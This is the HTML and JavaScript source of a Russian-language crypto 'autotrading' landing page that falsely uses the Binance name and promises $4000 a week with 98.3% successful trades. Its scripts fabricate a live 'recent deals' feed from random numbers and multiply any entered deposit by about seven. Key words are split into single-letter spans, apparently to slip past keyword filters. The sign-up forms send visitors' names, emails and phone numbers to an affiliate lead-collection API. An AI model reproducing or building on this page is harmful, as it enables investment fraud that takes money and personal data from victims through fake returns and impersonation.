<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Binance Chain</title>
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/>
    <link href="https://fonts.googleapis.com/css2?family=Raleway:wght@400&display=swap" rel="stylesheet"/>
    <link href="https://fonts.googleapis.com/css2?family=Nunito:wght@300&display=swap" rel="stylesheet"/>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=IBM+Plex+Sans:wght@400;600;700&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet"
          integrity="sha384-giJF6kkoqNQ00vy+HMDP7azOuL0xtbfIcaT9wjKHr8RbDVddVHyTfAAsrekwKmP1" crossorigin="anonymous"/>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.12/css/intlTelInput.min.css"/>
    <link rel="stylesheet" href="css/main.css">
</head>

<body>
<header>
    <div class="container">
        <div class="row">
            <div class="header_wrapper">
                <div class="logo">
                    <a href="index.html"><img src="img/logo.svg" alt="logo"/></a>
                </div>
                <nav class="header_nav">
                    <ul>
                        <li>
                            <a href="#about">Что это?</a>
                        </li>
                        <li>
                            <a href="#advantage">Преимущества</a>
                        </li>
                        <li>
                            <a href="#deal"><span>С</span><span>д</span><span>е</span><span>л</span><span>к</span><span>и</span></a>
                        </li>
                        <li>
                            <a href="#how_works">Как работает?</a>
                        </li>
                        <li>
                            <a href="#instruction">Инструкция</a>
                        </li>
                        <li>
                            <div class="btn_a"><a href="#second_form">Заполнить форму</a></div>
                        </li>
                    </ul>
                </nav>
                <div id="mySidebar" class="sidebar">
                    <a href="javascript:void(0)" class="closebtn" onclick="closeNav()"><img
                                src="img/close_btn.png"/></a>
                    <a href="#about">Что это?</a>
                    <a href="#advantage">Преимущества</a>
                    <a href="#deal"><span>С</span><span>д</span><span>е</span><span>л</span><span>к</span><span>и</span></a>
                    <a href="#how_works">Как работает?</a>
                    <a href="#instruction">Инструкция</a>
                    <div class="btn_a"><a href="#form">Заполнить форму</a></div>
                </div>
                <button class="openbtn" onclick="openNav()">
                    <img src="img/collapse_btn.svg"/>
                </button>
            </div>
        </div>
    </div>
</header>
<section class="first_section">
    <div class="container">
        <div class="row">
            <div class="col-lg-6">
                <div class="video_section">
                    <div class="video">
                        <div style="padding:56.25% 0 0 0;position:relative;">
                            <iframe src="https://player.vimeo.com/video/658570969?h=43365af1d7&amp;autoplay=1&muted=1&loop=1&badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479"
                                    frameborder="0" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen
                                    style="position:absolute;top:0;left:0;width:100%;height:100%;"
                                    title="Binance_PT_Explainer_EN_0705"></iframe>
<!--                            <iframe src="https://player.vimeo.com/video/658570969?h=43365af1d7&amp;autoplay=1&muted=1&loop=1&badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479"-->
<!--                                    frameborder="0" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen-->
<!--                                    style="position:absolute;top:0;left:0;width:100%;height:100%;"-->
<!--                                    title=""></iframe>-->
                        </div>
                    </div>
                </div>
            </div>
            <div class="col-lg-6 form_container">
                <div class="form" id="first_form">
                    <h3>
                        Подключайтесь к системе
                        <span>а</span><span>в</span><span>т</span><span>о</span><span>т</span><span>р</span><span>е</span><span>й</span><span>д</span><span>и</span><span>н</span><span>г</span><span>а</span>
                        <span class="color_span">Binance Smart Chain</span> и
                        <span>з</span><span>а</span><span>р</span><span>а</span><span>б</span><span>а</span><span>т</span><span>ы</span><span>в</span><span>а</span><span>й</span><span>т</span><span>е</span>
                        от <span>4</span><span>0</span><span>0</span><span>0</span><span>$</span> в неделю
                    </h3>
                    </h3>
                    <form class="main_form" id="leadform1">
                        <div class="input_wrapper">
                            <input type="text" name="fname" placeholder="Имя" id="name" />
                            <input type="text" name="lname" placeholder="Фамилия" id="name" />
                            <input type="email" name="email" placeholder="Email" id="email" />
                            <input type="text" name="fullphone" placeholder="" id="phone1" />
                            <!----><!--Заполните данные--><!---->
                            <input type="hidden" name="link_id" value="2112" />  
                            <input type="hidden" name="source" value="Binance_chain001" />
                            <input name="message" type="hidden" value="0">
				            <input name="time" class="registration__time" type="hidden" value="0">
                            <!----><!--Заполните данные--><!---->
                            <button class="submit_btn" type="submit">Подключиться</button>
                        </div>
                        <div class="form_message error inactive"
                             style="margin:15px 0;background-color: #ffd4d4;border: 2px dashed #ce0909;border-radius: 10px;padding: 20px;max-width: 350px;"></div>
                    </form>
                </div>
            </div>
        </div>

    </div>
    </div>

</section>
<section class="second_section" id="about">
    <div class="container">
        <div class="row">
            <h2>Binance Smart Chain – что это?</h2>
            <p>Это система для
                <span>а</span><span>в</span><span>т</span><span>о</span><span>т</span><span>р</span><span>е</span><span>й</span><span>д</span><span>и</span><span>н</span><span>г</span><span>а</span>
                на
                <span>к</span><span>р</span><span>и</span><span>п</span><span>т</span><span>о</span><span>в</span><span>а</span><span>л</span><span>ю</span><span>т</span><span>е</span>.
                Создатели технологии - <span>б</span><span>и</span><span>р</span><span>ж</span><span>а</span> Binance,
                которая
                не нуждается в представлении, они законодатели на рынке цифровых технологий. Поэтому BSC - это передовые
                технологии в сфере
                <span>к</span><span>р</span><span>и</span><span>п</span><span>т</span><span>о</span><span>в</span><span>а</span><span>л</span><span>ю</span><span>т</span>,
                у которой просто нет конкурентов. На данный момент технологию могут использовать 7 сертфицированных
                европейских
                б<span>р</span><span>о</span><span>к</span><span>е</span><span>р</span><span>о</span><span>в</span></p>

            <p class="blockqoute">
                Binance - крупнейшая
                <span>к</span><span>р</span><span>и</span><span>п</span><span>т</span><span>о</span><span>б</span><span>и</span><span>р</span><span>ж</span><span>а</span>
                в мире. Оборот <span>т</span><span>о</span><span>р</span><span>г</span><span>о</span><span>в</span>
                составляет более&nbsp;40&nbsp;млрд&nbsp;$ в день
            </p>

        </div>
    </div>
</section>
<section class="third_section" id="advantage">
    <div class="container">
        <div class="row">
            <h2>
                Преимущества
            </h2>
            <div class="advantage_wrapper">
                <div class="advantage_card">
                    <img src="img/Vector.svg" alt="icon">
                    <p class="card_text">98,3% успешных сделок</p>
                </div>
                <div class="advantage_card">
                    <img src="img/Vector1.svg" alt="icon">
                    <p class="card_text">Рекордная скорость выполнения транзакций</p>
                </div>
                <div class="advantage_card">
                    <img src="img/Vector2.svg" alt="icon">
                    <p class="card_text">Совместимость со 187 видов
                        <span>к</span><span>р</span><span>и</span><span>п</span><span>т</span><span>о</span><span>в</span><span>а</span><span>л</span><span>ю</span><span>т</span>
                    </p>
                </div>
                <div class="advantage_card">
                    <img src="img/Vector3.svg" alt="icon">
                    <p class="card_text">Масштабируемость - вкладывая больше сил и
                        <span>д</span><span>е</span><span>н</span><span>е</span><span>г</span> увеличивается
                        <span>з</span><span>а</span><span>р</span><span>а</span><span>б</span><span>о</span><span>т</span><span>о</span><span>к</span>
                    </p>
                </div>
            </div>
        </div>
    </div>
</section>
<section class="fourth_section" id="deal">
    <div class="container">
        <div class="row">
            <h2>
                Последние <span>С</span><span>д</span><span>е</span><span>л</span><span>к</span><span>и</span> закрытые
                с
                помощью Binance Smart Chain
            </h2>
            <div class="deals_header">
                <div class="time">
                    <span>Время</span>
                </div>
                <div class="crypto">
                    <span><span>К</span><span>р</span><span>и</span><span>п</span><span>т</span><span>о</span><span>в</span><span>а</span><span>л</span><span>ю</span><span>т</span>а</span>
                </div>
                <div class="sum">
                    <span>Сумма</span>
                </div>
                <div class="eqivalent">
                    <span>Эквивалент</span>
                </div>
                <div class="roi">
                    <span>ROI</span>
                </div>
            </div>
            <div class="deals_wrapper" id="deals_wrapper">

            </div>
            <a href="#first_form" class="form_link">Подключиться</a>
        </div>
    </div>
</section>
<section class="fifth_section" id="how_works">
    <div class="container">
        <div class="row">
            <h2>Как работает Binance Smart Chain?</h2>
            <p>Технология сделана на основе нового
                <span>б</span><span>л</span><span>о</span><span>к</span><span>ч</span><span>е</span><span>й</span><span>н</span><span>а</span>
                Binance Chain, что оптимизирован для сверхбыстрой
                <span>т</span><span>о</span><span>р</span><span>г</span><span>о</span><span>в</span>ли. В
                совокупности с искусственным интеллектом, который анализирует инфополе и изменение котировок опционов в
                ста
                самых влиятельных <span>б</span><span>и</span><span>р</span><span>ж</span><span>а</span>х мира,
                <span>а</span><span>л</span><span>г</span><span>о</span><span>р</span><span>и</span><span>т</span><span>м</span>
                позволяет в 98,3% случаях проделывать успешные
                <span>С</span><span>д</span><span>е</span><span>л</span><span>к</span><span>и</span>. Для остальных
                почти 2% в
                Binance Smart Chain работают профессиональные аналитики со стажем более 10 лет.</p>
            <div class="investment_wrapper">
                <div class="investment_card first">
                    <p>Введите сумму инвестирования:</p>
                    <input placeholder="$250" id="start_sum" type="text" maxlength="13">
                    <div class="crypto_result">
                        <img src="img/bitcoin.svg" alt="">
                        <span>=</span><span id="investment_bitcoin">0.004</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/etherium.svg" alt="">
                        <span>=</span><span id="investment_etherium">16.565</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/ripple.svg" alt="">
                        <span>=</span><span id="investment_ripple">146.231</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/tether.svg" alt="">
                        <span>=</span><span id="investment_tether">118.675</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/p.svg" alt="">
                        <span>=</span><span id="investment_p">118.675</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/litecoin.svg" alt="">
                        <span>=</span><span id="investment_litecoin">1.225</span>
                    </div>
                </div>
                <div class="arrow">
                    <img src="img/arrow-right.svg" alt="">
                </div>
                <div class="investment_card">
                    <p>Получите на выходе</p>
                    <div class="result">
                        <p id="result">$1742.48</p>
                    </div>
                    <div class="crypto_result">
                        <img src="img/bitcoin.svg" alt="">
                        <span>=</span><span id="result_bitcoin">0.029</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/etherium.svg" alt="">
                        <span>=</span><span id="result_etherium">118.675</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/ripple.svg" alt="">
                        <span>=</span><span id="result_ripple">115.456</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/tether.svg" alt="">
                        <span>=</span><span id="result_tether">1 018.937</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/p.svg" alt="">
                        <span>=</span><span id="result_p">118.675</span>
                    </div>
                    <div class="crypto_result">
                        <img src="img/litecoin.svg" alt="">
                        <span>=</span><span id="result_litecoin">8.535</span>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<section class="sixth_section" id="instruction">
    <div class="container">
        <div class="row">
            <h2>
                4 простых шага как подключиться
            </h2>
            <div class="advantage_wrapper instruction">
                <div class="advantage_card">
                    <img src="img/Group.svg" alt="icon">
                    <p class="card_text">Оставьте заявку на сайтe</p>
                </div>
                <div class="advantage_card">
                    <img src="img/Group1.svg" alt="icon">
                    <p class="card_text">Консультация с аналитиком и
                        <span>и</span><span>н</span><span>в</span><span>е</span><span>с</span><span>т</span><span>и</span><span>ц</span><span>и</span><span>и</span>
                        от <span>$</span><span>2</span><span>5</span><span>0</span> для работы системы</p>
                </div>
                <div class="advantage_card">
                    <img src="img/Group2.svg" alt="icon">
                    <p class="card_text">Настройка автоматической системы под Ваши запросы</p>
                </div>
                <div class="advantage_card">
                    <img src="img/Group3.svg" alt="icon">
                    <p class="card_text">Система Binance Smart Chain <span class="color_span">приумножит</span> ваши
                        <span>в</span><span>л</span><span>о</span><span>ж</span><span>е</span><span>н</span><span>и</span><span>я</span>
                    </p>
                </div>
            </div>
        </div>
    </div>
</section>
<section class="seventh_section">
    <div class="container">
        <div class="row">
            <div class="second_form" id="second_form">
                <h3>
                    Подключайтесь к системе
                    <span>а</span><span>в</span><span>т</span><span>о</span><span>т</span><span>р</span><span>е</span><span>й</span><span>д</span><span>и</span><span>н</span><span>г</span><span>а</span>
                    <span class="color_span">Binance Smart Chain</span> и
                    <span>з</span><span>а</span><span>р</span><span>а</span><span>б</span><span>а</span><span>т</span><span>ы</span><span>в</span><span>а</span><span>й</span><span>т</span><span>е</span>
                    от <span>4</span><span>0</span><span>0</span><span>0</span><span>$</span> в неделю
                </h3>
                </h3>
                <form class="main_form" id="leadform2">
                    <div class="input_wrapper">
                        <input type="text" name="fname" placeholder="Имя" id="name2" />
                        <input type="text" name="lname" placeholder="Фамилия" id="name2" />
                        <input type="email" name="email" placeholder="Email" id="email2" />
                        <input type="text" name="fullphone" placeholder="" id="phone2" />
                        <!----><!--Заполните данные--><!---->
                        <input type="hidden" name="link_id" value="2118" />  
                        <input type="hidden" name="source" value="Binance_chain" />
                        <input name="message" type="hidden" value="0">
				        <input name="time" class="registration__time" type="hidden" value="0">
                        <!----><!--Заполните данные--><!---->
                        <button class="submit_btn" type="submit">Отправить</button>
                    </div>
                    <div class="form_message error inactive"
                         style="margin:15px 0;background-color: #ffd4d4;border: 2px dashed #ce0909;border-radius: 10px;padding: 20px;"></div>
                </form>
                <style>
                    .form_message.error.inactive{
                        display: none;
                    }
                    .form_message.error.active{
                        display: block;
                        color: #0a0a0a;
                    }
                </style>
            </div>
        </div>
    </div>
</section>
<footer>
    <div class="container">
        <div class="row">
            <div class="footer_wrapper">
                <div class="logo">
                    <a href="index.html"><img src="img/logo.svg" alt="logo"/></a>
                </div>
                <p>@2022 All rights Reserved</p>
            </div>
        </div>
    </div>
</footer>

<script src="https://code.jquery.com/jquery-3.5.1.js" integrity="sha256-QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc="
        crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-b5kHyXgcpbZJO/tY9Ul7kGkf1S0CWuKcCD38l8YkeH8z8QjE0GmW1gYU5S9FOnJ0"
        crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.8/js/intlTelInput.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.2/jquery.validate.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.js"></script>
<script src="js/script.js"></script>
<script>
    //calculate result sum
    function formatNumber(num) {
        return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, " ");
    }
    $("#start_sum").on("keyup", function () {
        document.getElementById("result").innerText =
            "$" + formatNumber((this.value * 6.96).toFixed(2));
    });
    // function convert
    var requestURL = "index.html?action=get_rates";
    //"https://api.nomics.com/v1/currencies/ticker?key=bc0d11b3bdbb1839a05ab422dd3ce480&ids=ETC,BTC,XRP,LTC,USDT,DOT&interval=1d,30d&convert=USD&format=json";

    var arrOfCrypto = ["bitcoin", "p", "tether", "ripple", "litecoin", "etherium"];
    var request = new XMLHttpRequest();
    request.open("GET", requestURL);
    request.responseType = "json";
    request.send();
    request.onload = function () {
        var crypto = request.response;
        $("#start_sum").on("keyup", function () {
            for (let i = 0; i < arrOfCrypto.length; i++) {
                document.getElementById(
                    `investment_${arrOfCrypto[i]}`
                ).innerText = formatNumber((this.value / crypto[i]["price"]).toFixed(3));
                document.getElementById(
                    `result_${arrOfCrypto[i]}`
                ).innerText = formatNumber(
                    ((this.value * 6.968) / crypto[i]["price"]).toFixed(3)
                );
            }
        });
        var arrOfCryptocurrency = [
            {
                name: "Bitcoin",
                img_src: "img/bitcoin.svg",
                short_name: "BTC",
                coefficient: crypto[0]["price"],
            },
            {
                name: "Bitcoin",
                img_src: "img/bitcoin.svg",
                short_name: "BTC",
                coefficient: crypto[0]["price"],
            },
            {
                name: "Bitcoin",
                img_src: "img/bitcoin.svg",
                short_name: "BTC",
                coefficient: crypto[0]["price"],
            },
            {
                name: "Bitcoin",
                img_src: "img/bitcoin.svg",
                short_name: "BTC",
                coefficient: crypto[0]["price"],
            },
            {
                name: "Ethereum",
                img_src: "img/etherium.svg",
                short_name: "ETC",
                coefficient: crypto[5]["price"],
            },
            {
                name: "Ethereum",
                img_src: "img/etherium.svg",
                short_name: "ETC",
                coefficient: crypto[5]["price"],
            },
            {
                name: "Ethereum",
                img_src: "img/etherium.svg",
                short_name: "ETC",
                coefficient: crypto[5]["price"],
            },
            {
                name: "Ripple",
                img_src: "img/ripple.svg",
                short_name: "XPR",
                coefficient: crypto[3]["price"],
            },
            {
                name: "Tether US",
                img_src: "img/tether.svg",
                short_name: "USDT",
                coefficient: crypto[2]["price"],
            },
            {
                name: "Tether US",
                img_src: "img/tether.svg",
                short_name: "USDT",
                coefficient: crypto[2]["price"],
            },
            {
                name: "Litecoin",
                img_src: "img/litecoin.svg",
                short_name: "LTC",
                coefficient: crypto[4]["price"],
            },
        ];
        var dealsWrapper = document.getElementById("deals_wrapper");
        function renderDeals() {
            for (let i = 0; i < 5; i++) {
                let deal = document.createElement("div");
                deal.className = "deal";
                let random_num = Math.floor(Math.random() * 11);
                let random_roi = (Math.random() * (182.0 - 8.0) + 8.0).toFixed(2);
                let random_sum = (Math.random() * (120000 - 500) + 500).toFixed(2);
                let imgSrc = arrOfCryptocurrency[random_num].img_src;
                let name = arrOfCryptocurrency[random_num].name;
                let shortName = arrOfCryptocurrency[random_num].short_name;
                let equivalent = formatNumber(
                    (random_sum / arrOfCryptocurrency[random_num].coefficient).toFixed(1)
                );
                let today = new Date();
                today.setSeconds(today.getSeconds() + i - 2);
                let time =
                    today.getHours() + ":" + today.getMinutes() + ":" + today.getSeconds();
                deal.innerHTML = `<div class="time"><span>${time}</span></div><div class="crypto"><img src="${imgSrc}" alt=""><span>${name}</span></div><div class="sum"><span>${equivalent} ${shortName}</span></div><div class="eqivalent"><span>$${formatNumber(
                    random_sum
                )}</span></div><div class="roi"><span>+${random_roi}%</span></div>`;
                dealsWrapper.appendChild(deal);
                deal.setAttribute("id", "first_deal");
            }
        }
        renderDeals();

        function addTransaction() {
            setInterval(function () {
                let deal = document.createElement("div");
                deal.className = "deal";
                let random_num = Math.floor(Math.random() * 11);
                let random_roi = (Math.random() * (182.0 - 8.0) + 8.0).toFixed(2);
                let random_sum = (Math.random() * (120000 - 500) + 500).toFixed(2);
                let imgSrc = arrOfCryptocurrency[random_num].img_src;
                let name = arrOfCryptocurrency[random_num].name;
                let shortName = arrOfCryptocurrency[random_num].short_name;
                let equivalent = formatNumber(
                    (random_sum / arrOfCryptocurrency[random_num].coefficient).toFixed(1)
                );
                let today = new Date();
                let time =
                    today.getHours() + ":" + today.getMinutes() + ":" + today.getSeconds();
                deal.innerHTML = `<div class="time"><span>${time}</span></div><div class="crypto"><img src="${imgSrc}" alt=""><span>${name}</span></div><div class="sum"><span>${equivalent} ${shortName}</span></div><div class="eqivalent"><span>$${formatNumber(
                    random_sum
                )}</span></div><div class="roi"><span>+${random_roi}%</span></div>`;
                dealsWrapper.appendChild(deal);
                deal.setAttribute("id", "first_deal");
                dealsWrapper.removeChild(document.getElementById("first_deal"));
            }, 4000);
        }
        addTransaction();
    };
</script>
<script src="https://cdn.report/build/build.signup.js"></script>
<script>
    function authorized(data) {
                if (data) {
                    const { url } = data;
                    if (url) {
                        location.href = url;
                    }
                }
            }
    new $shared['signup']({
            className: 'main_form', // class name of form
            fields: {
                fullphone: { required: true }, // Phone number (Mandatory)
                email: { required: true }, // User email (Mandatory)
                fname: { required: true }, // First name (Mandatory)
                lname: { required: false }, // Last name
                source: { required: true }, // Doesn't matter what you will put here (Mandatory)
                link_id: { required: true }, // Your uniq client ID
                type: { required: true }, // If value is internal password will be static. If you do not know what is that do not touch it
                // type: { required: true } // Type of registration.
            }, // field that will be passed to API
            headers: {
                'Content-Type': 'application/json',
                'point': "js",
            }, // Headers
            triggers: {
                error: true,
                success: true
            }, // Triggers for modal window, when result is fail or success. You can enable or disable it. Regarding this params you can see notification about status or so.
            url: 'https://cdn.report/rest/affboard', // Api url
            translation: {
                ru: {
                    1: 'Ведите последние 5 цифр номера с которого вам поступил звонок',
                    2: 'Код не верен',
                    200: "Регистрация успешно пройдена",
                    400: 'Возникли проблемы с регистрацией пользователя. Возможные причины: ',
                    403: 'Не все обязательные поля были заполнены',
                    500: 'Временные неполадки сервера, извините. Попробуйте позже, мы уже проводим технические работы по исправлению данной проблемы!',
                    423: 'Мы заподозрили странную активность с вашего IP попробуйте через 5 секунд и удостоверьтесь что вы ввели правильные данные',
                },
                en: {
                    1: 'Put 5 last digits of number from we are calling right now',
                    2: 'Code is not right',
                    200: "Registration was success",
                    423: 'We suspected strange activity from your IP try in 5 seconds and make sure you entered the correct data',
                    403: 'Validation was not passed',
                    400: 'There were problems with the user registration. Possible reasons:',
                    500: 'Temporary server problems, sorry. Later, we are already doing technical work to fix this problem!'
                }
            }, // Not required. Use if you want to change the translation
            clear: [ 'email', 'fullphone', 'fname', 'lname' ], // Not required. Use if you want to clear some field after registration,
            voice: 0 // 1 if you need verify the number of client, 0 vice versa. - Do not use it NOW just for request!
        });
</script>
<script>
    try {
        fetch('https://api.db-ip.com/v2/free/self').then((data) => data.json()).then((ip) => {
            const cache = [{ "name": "Afghanistan", "dial_code": "+93", "code": "AF" }, { "name": "Aland Islands", "dial_code": "+358", "code": "AX" }, { "name": "Albania", "dial_code": "+355", "code": "AL" }, { "name": "Algeria", "dial_code": "+213", "code": "DZ" }, { "name": "AmericanSamoa", "dial_code": "+1684", "code": "AS" }, { "name": "Andorra", "dial_code": "+376", "code": "AD" }, { "name": "Angola", "dial_code": "+244", "code": "AO" }, { "name": "Anguilla", "dial_code": "+1264", "code": "AI" }, { "name": "Antarctica", "dial_code": "+672", "code": "AQ" }, { "name": "Antigua and Barbuda", "dial_code": "+1268", "code": "AG" }, { "name": "Argentina", "dial_code": "+54", "code": "AR" }, { "name": "Armenia", "dial_code": "+374", "code": "AM" }, { "name": "Aruba", "dial_code": "+297", "code": "AW" }, { "name": "Australia", "dial_code": "+61", "code": "AU" }, { "name": "Austria", "dial_code": "+43", "code": "AT" }, { "name": "Azerbaijan", "dial_code": "+994", "code": "AZ" }, { "name": "Bahamas", "dial_code": "+1242", "code": "BS" }, { "name": "Bahrain", "dial_code": "+973", "code": "BH" }, { "name": "Bangladesh", "dial_code": "+880", "code": "BD" }, { "name": "Barbados", "dial_code": "+1246", "code": "BB" }, { "name": "Belarus", "dial_code": "+375", "code": "BY" }, { "name": "Belgium", "dial_code": "+32", "code": "BE" }, { "name": "Belize", "dial_code": "+501", "code": "BZ" }, { "name": "Benin", "dial_code": "+229", "code": "BJ" }, { "name": "Bermuda", "dial_code": "+1441", "code": "BM" }, { "name": "Bhutan", "dial_code": "+975", "code": "BT" }, { "name": "Bolivia, Plurinational State of", "dial_code": "+591", "code": "BO" }, { "name": "Bosnia and Herzegovina", "dial_code": "+387", "code": "BA" }, { "name": "Botswana", "dial_code": "+267", "code": "BW" }, { "name": "Brazil", "dial_code": "+55", "code": "BR" }, { "name": "British Indian Ocean Territory", "dial_code": "+246", "code": "IO" }, { "name": "Brunei Darussalam", "dial_code": "+673", "code": "BN" }, { "name": "Bulgaria", "dial_code": "+359", "code": "BG" }, { "name": "Burkina Faso", "dial_code": "+226", "code": "BF" }, { "name": "Burundi", "dial_code": "+257", "code": "BI" }, { "name": "Cambodia", "dial_code": "+855", "code": "KH" }, { "name": "Cameroon", "dial_code": "+237", "code": "CM" }, { "name": "Canada", "dial_code": "+1", "code": "CA" }, { "name": "Cape Verde", "dial_code": "+238", "code": "CV" }, { "name": "Cayman Islands", "dial_code": "+ 345", "code": "KY" }, { "name": "Central African Republic", "dial_code": "+236", "code": "CF" }, { "name": "Chad", "dial_code": "+235", "code": "TD" }, { "name": "Chile", "dial_code": "+56", "code": "CL" }, { "name": "China", "dial_code": "+86", "code": "CN" }, { "name": "Christmas Island", "dial_code": "+61", "code": "CX" }, { "name": "Cocos (Keeling) Islands", "dial_code": "+61", "code": "CC" }, { "name": "Colombia", "dial_code": "+57", "code": "CO" }, { "name": "Comoros", "dial_code": "+269", "code": "KM" }, { "name": "Congo", "dial_code": "+242", "code": "CG" }, { "name": "Congo, The Democratic Republic of the Congo", "dial_code": "+243", "code": "CD" }, { "name": "Cook Islands", "dial_code": "+682", "code": "CK" }, { "name": "Costa Rica", "dial_code": "+506", "code": "CR" }, { "name": "Cote d'Ivoire", "dial_code": "+225", "code": "CI" }, { "name": "Croatia", "dial_code": "+385", "code": "HR" }, { "name": "Cuba", "dial_code": "+53", "code": "CU" }, { "name": "Cyprus", "dial_code": "+357", "code": "CY" }, { "name": "Czech Republic", "dial_code": "+420", "code": "CZ" }, { "name": "Denmark", "dial_code": "+45", "code": "DK" }, { "name": "Djibouti", "dial_code": "+253", "code": "DJ" }, { "name": "Dominica", "dial_code": "+1767", "code": "DM" }, { "name": "Dominican Republic", "dial_code": "+1849", "code": "DO" }, { "name": "Ecuador", "dial_code": "+593", "code": "EC" }, { "name": "Egypt", "dial_code": "+20", "code": "EG" }, { "name": "El Salvador", "dial_code": "+503", "code": "SV" }, { "name": "Equatorial Guinea", "dial_code": "+240", "code": "GQ" }, { "name": "Eritrea", "dial_code": "+291", "code": "ER" }, { "name": "Estonia", "dial_code": "+372", "code": "EE" }, { "name": "Ethiopia", "dial_code": "+251", "code": "ET" }, { "name": "Falkland Islands (Malvinas)", "dial_code": "+500", "code": "FK" }, { "name": "Faroe Islands", "dial_code": "+298", "code": "FO" }, { "name": "Fiji", "dial_code": "+679", "code": "FJ" }, { "name": "Finland", "dial_code": "+358", "code": "FI" }, { "name": "France", "dial_code": "+33", "code": "FR" }, { "name": "French Guiana", "dial_code": "+594", "code": "GF" }, { "name": "French Polynesia", "dial_code": "+689", "code": "PF" }, { "name": "Gabon", "dial_code": "+241", "code": "GA" }, { "name": "Gambia", "dial_code": "+220", "code": "GM" }, { "name": "Georgia", "dial_code": "+995", "code": "GE" }, { "name": "Germany", "dial_code": "+49", "code": "DE" }, { "name": "Ghana", "dial_code": "+233", "code": "GH" }, { "name": "Gibraltar", "dial_code": "+350", "code": "GI" }, { "name": "Greece", "dial_code": "+30", "code": "GR" }, { "name": "Greenland", "dial_code": "+299", "code": "GL" }, { "name": "Grenada", "dial_code": "+1473", "code": "GD" }, { "name": "Guadeloupe", "dial_code": "+590", "code": "GP" }, { "name": "Guam", "dial_code": "+1671", "code": "GU" }, { "name": "Guatemala", "dial_code": "+502", "code": "GT" }, { "name": "Guernsey", "dial_code": "+44", "code": "GG" }, { "name": "Guinea", "dial_code": "+224", "code": "GN" }, { "name": "Guinea-Bissau", "dial_code": "+245", "code": "GW" }, { "name": "Guyana", "dial_code": "+595", "code": "GY" }, { "name": "Haiti", "dial_code": "+509", "code": "HT" }, { "name": "Holy See (Vatican City State)", "dial_code": "+379", "code": "VA" }, { "name": "Honduras", "dial_code": "+504", "code": "HN" }, { "name": "Hong Kong", "dial_code": "+852", "code": "HK" }, { "name": "Hungary", "dial_code": "+36", "code": "HU" }, { "name": "Iceland", "dial_code": "+354", "code": "IS" }, { "name": "India", "dial_code": "+91", "code": "IN" }, { "name": "Indonesia", "dial_code": "+62", "code": "ID" }, { "name": "Iran, Islamic Republic of Persian Gulf", "dial_code": "+98", "code": "IR" }, { "name": "Iraq", "dial_code": "+964", "code": "IQ" }, { "name": "Ireland", "dial_code": "+353", "code": "IE" }, { "name": "Isle of Man", "dial_code": "+44", "code": "IM" }, { "name": "Israel", "dial_code": "+972", "code": "IL" }, { "name": "Italy", "dial_code": "+39", "code": "IT" }, { "name": "Jamaica", "dial_code": "+1876", "code": "JM" }, { "name": "Japan", "dial_code": "+81", "code": "JP" }, { "name": "Jersey", "dial_code": "+44", "code": "JE" }, { "name": "Jordan", "dial_code": "+962", "code": "JO" }, { "name": "Kazakhstan", "dial_code": "+77", "code": "KZ" }, { "name": "Kenya", "dial_code": "+254", "code": "KE" }, { "name": "Kiribati", "dial_code": "+686", "code": "KI" }, { "name": "Korea, Democratic People's Republic of Korea", "dial_code": "+850", "code": "KP" }, { "name": "Korea, Republic of South Korea", "dial_code": "+82", "code": "KR" }, { "name": "Kuwait", "dial_code": "+965", "code": "KW" }, { "name": "Kyrgyzstan", "dial_code": "+996", "code": "KG" }, { "name": "Laos", "dial_code": "+856", "code": "LA" }, { "name": "Latvia", "dial_code": "+371", "code": "LV" }, { "name": "Lebanon", "dial_code": "+961", "code": "LB" }, { "name": "Lesotho", "dial_code": "+266", "code": "LS" }, { "name": "Liberia", "dial_code": "+231", "code": "LR" }, { "name": "Libyan Arab Jamahiriya", "dial_code": "+218", "code": "LY" }, { "name": "Liechtenstein", "dial_code": "+423", "code": "LI" }, { "name": "Lithuania", "dial_code": "+370", "code": "LT" }, { "name": "Luxembourg", "dial_code": "+352", "code": "LU" }, { "name": "Macao", "dial_code": "+853", "code": "MO" }, { "name": "Macedonia", "dial_code": "+389", "code": "MK" }, { "name": "Madagascar", "dial_code": "+261", "code": "MG" }, { "name": "Malawi", "dial_code": "+265", "code": "MW" }, { "name": "Malaysia", "dial_code": "+60", "code": "MY" }, { "name": "Maldives", "dial_code": "+960", "code": "MV" }, { "name": "Mali", "dial_code": "+223", "code": "ML" }, { "name": "Malta", "dial_code": "+356", "code": "MT" }, { "name": "Marshall Islands", "dial_code": "+692", "code": "MH" }, { "name": "Martinique", "dial_code": "+596", "code": "MQ" }, { "name": "Mauritania", "dial_code": "+222", "code": "MR" }, { "name": "Mauritius", "dial_code": "+230", "code": "MU" }, { "name": "Mayotte", "dial_code": "+262", "code": "YT" }, { "name": "Mexico", "dial_code": 